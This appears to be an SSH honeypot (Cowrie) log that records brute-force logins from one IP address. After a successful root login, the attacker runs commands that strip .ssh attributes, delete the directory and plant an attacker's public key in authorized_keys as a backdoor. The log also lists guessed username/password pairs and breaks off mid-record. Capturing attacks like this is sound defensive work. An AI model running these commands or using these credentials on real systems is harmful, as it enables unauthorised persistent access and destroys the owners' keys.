{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:23.516553Z","src_ip":"212.227.235.229","session":"18fd550ad520"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55004,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c169515014f","protocol":"ssh","message":"New connection: 212.227.235.229:55004 (1.2.3.4:22) [session: 3c169515014f]","sensor":"my-vps","timestamp":"2025-09-08T22:40:23.825135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:40:23.826068Z","src_ip":"212.227.235.229","session":"3c169515014f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:40:24.136451Z","src_ip":"212.227.235.229","session":"3c169515014f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:40:25.420825Z","src_ip":"212.227.235.229","session":"3c169515014f"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:25.732383Z","src_ip":"212.227.235.229","session":"9aa9db274c1c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:25.733768Z","src_ip":"212.227.235.229","session":"3c169515014f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41598,"dst_ip":"1.2.3.4","dst_port":22,"session":"48a32da42a52","protocol":"ssh","message":"New connection: 212.227.235.229:41598 (1.2.3.4:22) [session: 48a32da42a52]","sensor":"my-vps","timestamp":"2025-09-08T22:40:29.275596Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:40:29.276782Z","src_ip":"212.227.235.229","session":"48a32da42a52"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-09-08T22:40:29.364105Z","src_ip":"212.227.235.229","session":"48a32da42a52"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:29.466378Z","src_ip":"212.227.235.229","session":"48a32da42a52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57534,"dst_ip":"1.2.3.4","dst_port":22,"session":"698a7c158797","protocol":"ssh","message":"New connection: 212.227.235.229:57534 (1.2.3.4:22) [session: 698a7c158797]","sensor":"my-vps","timestamp":"2025-09-08T22:40:30.261028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:40:30.274446Z","src_ip":"212.227.235.229","session":"698a7c158797"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:40:30.537533Z","src_ip":"212.227.235.229","session":"698a7c158797"}
{"eventid":"cowrie.login.failed","username":"gaoyuan","password":"111","message":"login attempt [gaoyuan/111] failed","sensor":"my-vps","timestamp":"2025-09-08T22:40:31.528011Z","src_ip":"212.227.235.229","session":"698a7c158797"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:32.781831Z","src_ip":"212.227.235.229","session":"698a7c158797"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44898,"dst_ip":"1.2.3.4","dst_port":22,"session":"010582c592cf","protocol":"ssh","message":"New connection: 212.227.235.229:44898 (1.2.3.4:22) [session: 010582c592cf]","sensor":"my-vps","timestamp":"2025-09-08T22:40:40.672936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:40:40.673626Z","src_ip":"212.227.235.229","session":"010582c592cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:40:40.774806Z","src_ip":"212.227.235.229","session":"010582c592cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45642,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe4753d14efd","protocol":"ssh","message":"New connection: 212.227.235.229:45642 (1.2.3.4:22) [session: fe4753d14efd]","sensor":"my-vps","timestamp":"2025-09-08T22:40:40.961029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:40:40.961861Z","src_ip":"212.227.235.229","session":"fe4753d14efd"}
{"eventid":"cowrie.login.failed","username":"superman","password":"0","message":"login attempt [superman/0] failed","sensor":"my-vps","timestamp":"2025-09-08T22:40:41.214453Z","src_ip":"212.227.235.229","session":"010582c592cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:40:41.286242Z","src_ip":"212.227.235.229","session":"fe4753d14efd"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:42.315851Z","src_ip":"212.227.235.229","session":"010582c592cf"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"Welcome1","message":"login attempt [raspberry/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:40:42.623651Z","src_ip":"212.227.235.229","session":"fe4753d14efd"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:43.950284Z","src_ip":"212.227.235.229","session":"fe4753d14efd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:40:51.501952Z","src_ip":"212.227.235.229","session":"d00ce6647cee"}
{"eventid":"cowrie.session.closed","duration":"55.5","message":"Connection lost after 55.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:40:51.503916Z","src_ip":"212.227.235.229","session":"d00ce6647cee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35392,"dst_ip":"1.2.3.4","dst_port":22,"session":"416b3d40d327","protocol":"ssh","message":"New connection: 212.227.235.229:35392 (1.2.3.4:22) [session: 416b3d40d327]","sensor":"my-vps","timestamp":"2025-09-08T22:41:07.203624Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:07.204471Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:07.438618Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.login.success","username":"root","password":"Linux@123","message":"login attempt [root/Linux@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:41:08.378795Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:41:08.910017Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:41:08.910807Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:41:08.912046Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:09.149050Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:41:09.635209Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:41:09.636060Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:41:09.873027Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:09.873997Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35394,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3637913dc4e","protocol":"ssh","message":"New connection: 212.227.235.229:35394 (1.2.3.4:22) [session: a3637913dc4e]","sensor":"my-vps","timestamp":"2025-09-08T22:41:10.104605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:10.105536Z","src_ip":"212.227.235.229","session":"a3637913dc4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:10.339836Z","src_ip":"212.227.235.229","session":"a3637913dc4e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:41:11.320366Z","src_ip":"212.227.235.229","session":"a3637913dc4e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:12.557086Z","src_ip":"212.227.235.229","session":"a3637913dc4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35396,"dst_ip":"1.2.3.4","dst_port":22,"session":"d60c05939d59","protocol":"ssh","message":"New connection: 212.227.235.229:35396 (1.2.3.4:22) [session: d60c05939d59]","sensor":"my-vps","timestamp":"2025-09-08T22:41:12.786506Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:12.787192Z","src_ip":"212.227.235.229","session":"d60c05939d59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256"